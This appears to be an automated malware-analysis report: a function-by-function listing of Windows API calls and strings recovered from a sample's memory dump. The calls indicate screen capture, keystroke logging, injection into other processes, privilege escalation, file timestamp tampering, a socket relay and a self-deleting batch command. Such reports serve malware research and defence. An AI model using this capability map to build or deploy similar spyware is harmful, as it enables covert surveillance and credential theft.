Part of subcall function 0280E301: EnterCriticalSection.KERNEL32(02843510,?,0280E5BF,?,0280E617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 0280E311
Part of subcall function 0280E301: LeaveCriticalSection.KERNEL32(02843510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,0281BE0B,?,?,00000830), ref: 0280E340

Part of subcall function 0281DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0281DEC9
Part of subcall function 0281DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0281DED5
Part of subcall function 0281DEBB: SetLastError.KERNEL32(00000001,028242C8,02842954,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0281DEED

SetFileTime.KERNEL32(?,?,?,?), ref: 0280E813

Strings

SetFileInformationByHandle, xrefs: 0280E7BD
kernel32.dll, xrefs: 0280E7C2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028248F2, Relevance: 14.5, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 02824932

Part of subcall function 02811791: InitializeCriticalSection.KERNEL32(02843510), ref: 028117B1
Part of subcall function 02811791: InitializeCriticalSection.KERNEL32 ref: 028117C6
Part of subcall function 02811791: memset.MSVCRT ref: 028117DB
Part of subcall function 02811791: TlsAlloc.KERNEL32(?,00000000,02824986,?,?,00000001), ref: 028117F2
Part of subcall function 02811791: GetModuleHandleW.KERNEL32(?), ref: 02811817

WSAStartup.WS2_32(00000202,?), ref: 02824998
CreateEventW.KERNEL32(02842974,00000001), ref: 028249BA

Part of subcall function 0281500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 02815020
Part of subcall function 0281500E: GetTokenInformation.ADVAPI32(?,0000000C,02842968,00000004,?), ref: 02815048
Part of subcall function 0281500E: CloseHandle.KERNEL32(?), ref: 0281505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 028249EC

Part of subcall function 028246CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0282470E

GetCurrentProcessId.KERNEL32 ref: 02824A17

Part of subcall function 0282472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 02824777
Part of subcall function 0282472D: lstrcmpiW.KERNEL32(?,?), ref: 028247A6

Part of subcall function 028247E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02824819
Part of subcall function 028247E5: lstrcatW.KERNEL32(?,.dat), ref: 02824879
Part of subcall function 028247E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0282489E
Part of subcall function 028247E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 028248BB
Part of subcall function 028247E5: CloseHandle.KERNEL32 ref: 028248C8

Part of subcall function 028240F3: IsBadReadPtr.KERNEL32 ref: 0282412C

Strings

GetProcAddress, xrefs: 02824941
LoadLibraryA, xrefs: 0282494D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 0280E632
memcpy.MSVCRT ref: 0280E645
memcpy.MSVCRT ref: 0280E658
memcpy.MSVCRT ref: 0280E663
GetFileTime.KERNEL32(?,?,?), ref: 0280E687
memcpy.MSVCRT ref: 0280E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0280E5F8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(02843510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0282305A
LeaveCriticalSection.KERNEL32(02843510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02823084

Part of subcall function 02821215: memset.MSVCRT ref: 0282122B
Part of subcall function 02821215: InitializeCriticalSection.KERNEL32(02842910), ref: 0282123B
Part of subcall function 02821215: memset.MSVCRT ref: 0282126A
Part of subcall function 02821215: InitializeCriticalSection.KERNEL32(028428F0), ref: 02821274

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Part of subcall function 02833DAE: memcpy.MSVCRT ref: 02833DE4

memcmp.MSVCRT ref: 02823175
memcmp.MSVCRT ref: 028231A6

Part of subcall function 02833D5A: memcpy.MSVCRT ref: 02833D94

EnterCriticalSection.KERNEL32(02842910), ref: 02823219

Part of subcall function 0282130C: GetTickCount.KERNEL32 ref: 02821313

Part of subcall function 02821723: EnterCriticalSection.KERNEL32(028428F0,0284292C,?,?,02842910), ref: 02821736
Part of subcall function 02821723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 028217E1
Part of subcall function 02821723: LeaveCriticalSection.KERNEL32(028428F0,?,?,02842910), ref: 028218CB

Part of subcall function 0282198D: EnterCriticalSection.KERNEL32(029927B8,?,?,?,?,02842910), ref: 02821A67
Part of subcall function 0282198D: LeaveCriticalSection.KERNEL32(029927B8,000000FF,00000000,?,?,?,?,02842910), ref: 02821A8F

LeaveCriticalSection.KERNEL32(02842910,0284292C,0284292C,0284292C), ref: 02823269

Part of subcall function 02825FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,0284292C,?,?,02842910,?,?,?,?,02823260,0284292C), ref: 02825FD6

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Strings

!, xrefs: 02823187
!, xrefs: 028231AF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 02819657
GetProcAddress.KERNEL32(?,?), ref: 02819685
GetProcAddress.KERNEL32(?,?), ref: 0281969F
GetProcAddress.KERNEL32(?,?), ref: 028196BB
FreeLibrary.KERNEL32 ref: 02819769

Part of subcall function 028150C0: GetCurrentThread.KERNEL32 ref: 028150D4
Part of subcall function 028150C0: OpenThreadToken.ADVAPI32 ref: 028150DB
Part of subcall function 028150C0: GetCurrentProcess.KERNEL32 ref: 028150EB
Part of subcall function 028150C0: OpenProcessToken.ADVAPI32 ref: 028150F2
Part of subcall function 028150C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 02815113
Part of subcall function 028150C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 02815128
Part of subcall function 028150C0: GetLastError.KERNEL32 ref: 02815132
Part of subcall function 028150C0: CloseHandle.KERNEL32(00000001), ref: 02815143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 028196E8

Part of subcall function 028195BE: EqualSid.ADVAPI32(?,5B867A00), ref: 028195E1
Part of subcall function 028195BE: CloseHandle.KERNEL32(00000001), ref: 02819628

Strings

SeTcbPrivilege, xrefs: 028196DE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 02816F50
FlushFileBuffers.KERNEL32 ref: 02817036

Part of subcall function 028244FB: FindFirstFileW.KERNEL32(?,?), ref: 0282452C
Part of subcall function 028244FB: FindNextFileW.KERNEL32(?,?), ref: 0282457E
Part of subcall function 028244FB: FindClose.KERNEL32 ref: 02824589
Part of subcall function 028244FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 02824595
Part of subcall function 028244FB: RemoveDirectoryW.KERNEL32(?), ref: 0282459C

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

PathRemoveFileSpecW.SHLWAPI(?), ref: 02816F85

Part of subcall function 0280E35B: GetTempPathW.KERNEL32(00000104,?), ref: 0280E376
Part of subcall function 0280E35B: PathAddBackslashW.SHLWAPI(?), ref: 0280E3A0
Part of subcall function 0280E35B: CreateDirectoryW.KERNEL32(?), ref: 0280E457
Part of subcall function 0280E35B: SetFileAttributesW.KERNEL32(?), ref: 0280E468
Part of subcall function 0280E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0280E481
Part of subcall function 0280E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0280E492

MoveFileExW.KERNEL32(?,?,00000001), ref: 02816FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 02816FE5

Part of subcall function 0280E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0280E594

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Sleep.KERNEL32(00001388), ref: 02817028

Strings

.tmp, xrefs: 02816F9C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02821051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(02843510,?,?,00000000,028211FB,?,?,?,7C809C98,00000014,00000000), ref: 02821067
LeaveCriticalSection.KERNEL32(02843510,?,?,00000000,028211FB,?,?,?,7C809C98,00000014,00000000), ref: 0282108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 028210AB
GetProcAddress.KERNEL32 ref: 028210B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 028210D4

Strings

RegDeleteKeyExW, xrefs: 028210A1
advapi32.dll, xrefs: 028210A6

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028340CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 028340DC

Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824A89
Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824AC4
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B04
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B27
Part of subcall function 02824A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 02824B77

CreateThread.KERNEL32(00000000,00000000,028340AB,?), ref: 02834132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0283413D
CloseHandle.KERNEL32 ref: 02834144
WaitForSingleObject.KERNEL32(?,00002710), ref: 02834154
CloseHandle.KERNEL32(?), ref: 0283415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0283416C
CloseHandle.KERNEL32 ref: 02834173

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02831474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 02832A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 02832A47

Part of subcall function 02816B66: select.WS2_32(00000000,?,00000000,00000000), ref: 02816BC5
Part of subcall function 02816B66: recv.WS2_32(?,?,?,00000000), ref: 02816BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0283154F
memcpy.MSVCRT ref: 02831587
FreeAddrInfoW.WS2_32(?), ref: 02831595
memset.MSVCRT ref: 028315B0

Part of subcall function 028313F4: getpeername.WS2_32(?,?,?), ref: 02831418
Part of subcall function 028313F4: getsockname.WS2_32(?,?,?), ref: 02831430
Part of subcall function 028313F4: send.WS2_32(00000000,?,00000008,00000000), ref: 02831461

Part of subcall function 02816D02: socket.WS2_32(?,00000001,00000006), ref: 02816D0E
Part of subcall function 02816D02: bind.WS2_32 ref: 02816D2B
Part of subcall function 02816D02: listen.WS2_32(?,00000001), ref: 02816D38
Part of subcall function 02816D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,028315FC,?,?,?), ref: 02816D42
Part of subcall function 02816D02: closesocket.WS2_32 ref: 02816D4B
Part of subcall function 02816D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,028315FC,?,?,?), ref: 02816D52

Part of subcall function 02816EB5: accept.WS2_32(?,00000000,?), ref: 02816ED6

Part of subcall function 02816C17: socket.WS2_32(?,00000001,00000006), ref: 02816C23
Part of subcall function 02816C17: connect.WS2_32 ref: 02816C40
Part of subcall function 02816C17: closesocket.WS2_32 ref: 02816C4B

Part of subcall function 0283304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 02833061

Part of subcall function 02816D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02816D88
Part of subcall function 02816D60: recv.WS2_32(?,?,00000400,00000000), ref: 02816DB4
Part of subcall function 02816D60: send.WS2_32(?,?,?,00000000), ref: 02816DD6
Part of subcall function 02816D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02816E03

Part of subcall function 02816EE0: shutdown.WS2_32(?,00000002), ref: 02816EEB
Part of subcall function 02816EE0: closesocket.WS2_32 ref: 02816EF2

Strings

[, xrefs: 028315CD
[, xrefs: 02831609
[, xrefs: 028316E7
Z, xrefs: 02831700

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02813D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 02813D5E
EnterCriticalSection.KERNEL32 ref: 02813D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 02813DB8
GetTickCount.KERNEL32 ref: 02813DCB

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0282D95F: GetSystemTime.KERNEL32(?), ref: 0282D969

Part of subcall function 0280CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0280CEB9

GetTickCount.KERNEL32 ref: 02813FC5

Part of subcall function 0280F1EF: memcmp.MSVCRT ref: 0280F1FB

Part of subcall function 0280CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CD70
Part of subcall function 0280CD5A: memcpy.MSVCRT ref: 0280CDCD
Part of subcall function 0280CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1,?,00000002), ref: 0280CDDD
Part of subcall function 0280CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0280CE11
Part of subcall function 0280CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CE9F

Part of subcall function 02813906: memset.MSVCRT ref: 028139D5
Part of subcall function 02813906: memcpy.MSVCRT ref: 02813A30
Part of subcall function 02813906: memcmp.MSVCRT ref: 02813AAB
Part of subcall function 02813906: memcpy.MSVCRT ref: 02813AFF
Part of subcall function 02813906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 02813BD2
Part of subcall function 02813906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 02813BF0

GetTickCount.KERNEL32 ref: 02813FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 02814021

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 02814046
LeaveCriticalSection.KERNEL32 ref: 0281405C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02813906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 02825594: GetSystemTime.KERNEL32(?), ref: 028255BA
Part of subcall function 02825594: Sleep.KERNEL32(000005DC), ref: 028255D3
Part of subcall function 02825594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 028255DC

Part of subcall function 0280ECBD: memcmp.MSVCRT ref: 0280ED1A
Part of subcall function 0280ECBD: memcpy.MSVCRT ref: 0280ED5A

Part of subcall function 02824BA2: memcpy.MSVCRT ref: 02824BB2

Part of subcall function 0280EE09: memset.MSVCRT ref: 0280EE1C
Part of subcall function 0280EE09: memcpy.MSVCRT ref: 0280EE37
Part of subcall function 0280EE09: memcpy.MSVCRT ref: 0280EE5F
Part of subcall function 0280EE09: memcpy.MSVCRT ref: 0280EE83

memset.MSVCRT ref: 028139D5

Part of subcall function 0280CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CD70
Part of subcall function 0280CD5A: memcpy.MSVCRT ref: 0280CDCD
Part of subcall function 0280CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1,?,00000002), ref: 0280CDDD
Part of subcall function 0280CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0280CE11
Part of subcall function 0280CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02813FA1), ref: 0280CE9F

Part of subcall function 0280F1A8: EnterCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1B8
Part of subcall function 0280F1A8: LeaveCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1E2

memcpy.MSVCRT ref: 02813A30

Part of subcall function 0280CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0280CEB9

memcmp.MSVCRT ref: 02813AAB

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

memcpy.MSVCRT ref: 02813AFF

Part of subcall function 0280F0E1: memcmp.MSVCRT ref: 0280F0FD

Part of subcall function 0280F1EF: memcmp.MSVCRT ref: 0280F1FB

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

Part of subcall function 028123F1: memcpy.MSVCRT ref: 02812409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 02813BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 02813BF0

Part of subcall function 0280EEA9: memcpy.MSVCRT ref: 0280EED2

Part of subcall function 0280EDAE: memcpy.MSVCRT ref: 0280EDF9

Part of subcall function 0280F040: memcmp.MSVCRT ref: 0280F0B6

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0283E360: _errno.MSVCRT ref: 0283E37B
Part of subcall function 0283E360: _errno.MSVCRT ref: 0283E3AD

Strings

2, xrefs: 02813B51

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 02815160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 02815179
GetLastError.KERNEL32(?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 02815183

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 028151AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028151BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028151D1

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CloseHandle.KERNEL32(00000001), ref: 028151FD

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02833382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 028333A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 028333F2

Part of subcall function 02832EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,0280FD6D,?,00000004,00007530,?,?,?,?), ref: 02832ED9
Part of subcall function 02832EA3: WSASetLastError.WS2_32(?), ref: 02832F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 028334D2
shutdown.WS2_32(?,00000001), ref: 028334FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 02833526

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 0283357A

Strings

, xrefs: 028334E3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280DFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 0280E010
LeaveCriticalSection.KERNEL32 ref: 0280E0C0

Part of subcall function 02814085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 02814097
Part of subcall function 02814085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 028140AF
Part of subcall function 02814085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 028140EE
Part of subcall function 02814085: CreateCompatibleDC.GDI32 ref: 028140FF
Part of subcall function 02814085: LoadCursorW.USER32(00000000,00007F00), ref: 02814115
Part of subcall function 02814085: GetIconInfo.USER32(?,?), ref: 02814129
Part of subcall function 02814085: GetCursorPos.USER32(?), ref: 02814138
Part of subcall function 02814085: GetDeviceCaps.GDI32(?,00000008), ref: 0281414F
Part of subcall function 02814085: GetDeviceCaps.GDI32(?,0000000A), ref: 02814158
Part of subcall function 02814085: CreateCompatibleBitmap.GDI32(?,?), ref: 02814164
Part of subcall function 02814085: SelectObject.GDI32 ref: 02814172
Part of subcall function 02814085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 02814193
Part of subcall function 02814085: DrawIcon.USER32(?,?,?,?), ref: 028141C5
Part of subcall function 02814085: SelectObject.GDI32(?,00000008), ref: 028141E1
Part of subcall function 02814085: DeleteObject.GDI32 ref: 028141E8
Part of subcall function 02814085: DeleteDC.GDI32 ref: 028141EF
Part of subcall function 02814085: DeleteDC.GDI32 ref: 028141F6
Part of subcall function 02814085: FreeLibrary.KERNEL32(?), ref: 02814206
Part of subcall function 02814085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0281421C
Part of subcall function 02814085: FreeLibrary.KERNEL32(?), ref: 02814230

GetTickCount.KERNEL32 ref: 0280E06A
GetCurrentProcessId.KERNEL32 ref: 0280E071

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

GetKeyboardState.USER32(?), ref: 0280E0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 0280E0FF

Part of subcall function 0280DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,0280E138,?,?,?,?,?,00000009,00000000), ref: 0280DE7E
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DEEF
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF13
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF2A
Part of subcall function 0280DE64: memcpy.MSVCRT ref: 0280DF4A
Part of subcall function 0280DE64: LeaveCriticalSection.KERNEL32 ref: 0280DF65

Strings

, xrefs: 0280E11D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280B28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 0280B29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 0280B2B2
GetNativeSystemInfo.KERNEL32(?), ref: 0280B2E3

Part of subcall function 02820D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 02820D60

GetSystemMetrics.USER32(0000004F), ref: 0280B370

Part of subcall function 02820FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,0282BD4B,?), ref: 02820FF2

Part of subcall function 02820D19: RegFlushKey.ADVAPI32 ref: 02820D29
Part of subcall function 02820D19: RegCloseKey.ADVAPI32 ref: 02820D31

GetSystemMetrics.USER32(00000050), ref: 0280B363
GetSystemMetrics.USER32(0000004E), ref: 0280B36A

Strings

@, xrefs: 0280B2AB

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282B9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

PathIsDirectoryW.SHLWAPI(?), ref: 0282BA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 0282BA30

Part of subcall function 0282B883: memcpy.MSVCRT ref: 0282B9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 0282BA76

Part of subcall function 0280E717: memcpy.MSVCRT ref: 0280E775
Part of subcall function 0280E717: memcpy.MSVCRT ref: 0280E78A
Part of subcall function 0280E717: memcpy.MSVCRT ref: 0280E79F
Part of subcall function 0280E717: memcpy.MSVCRT ref: 0280E7AE
Part of subcall function 0280E717: SetFileTime.KERNEL32(?,?,?,?), ref: 0280E813

CloseHandle.KERNEL32 ref: 0282BA95
PathRemoveFileSpecW.SHLWAPI ref: 0282BAA2

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0282B9DE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 02824EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 02824F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 02824F59
LocalFree.KERNEL32(00000001), ref: 02824F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 02824EFC
ProfileImagePath, xrefs: 02824F26

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280AB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 0280ABB8
GetCommandLineW.KERNEL32 ref: 0280ABD9

Part of subcall function 02834333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0283435D
Part of subcall function 02834333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 02834392

GetUserNameExW.SECUR32(00000002,?), ref: 0280AC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 0280AC47
GetUserDefaultUILanguage.KERNEL32 ref: 0280ACB9
memcpy.MSVCRT ref: 0280ACED
memcpy.MSVCRT ref: 0280AD02
memcpy.MSVCRT ref: 0280AD18

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

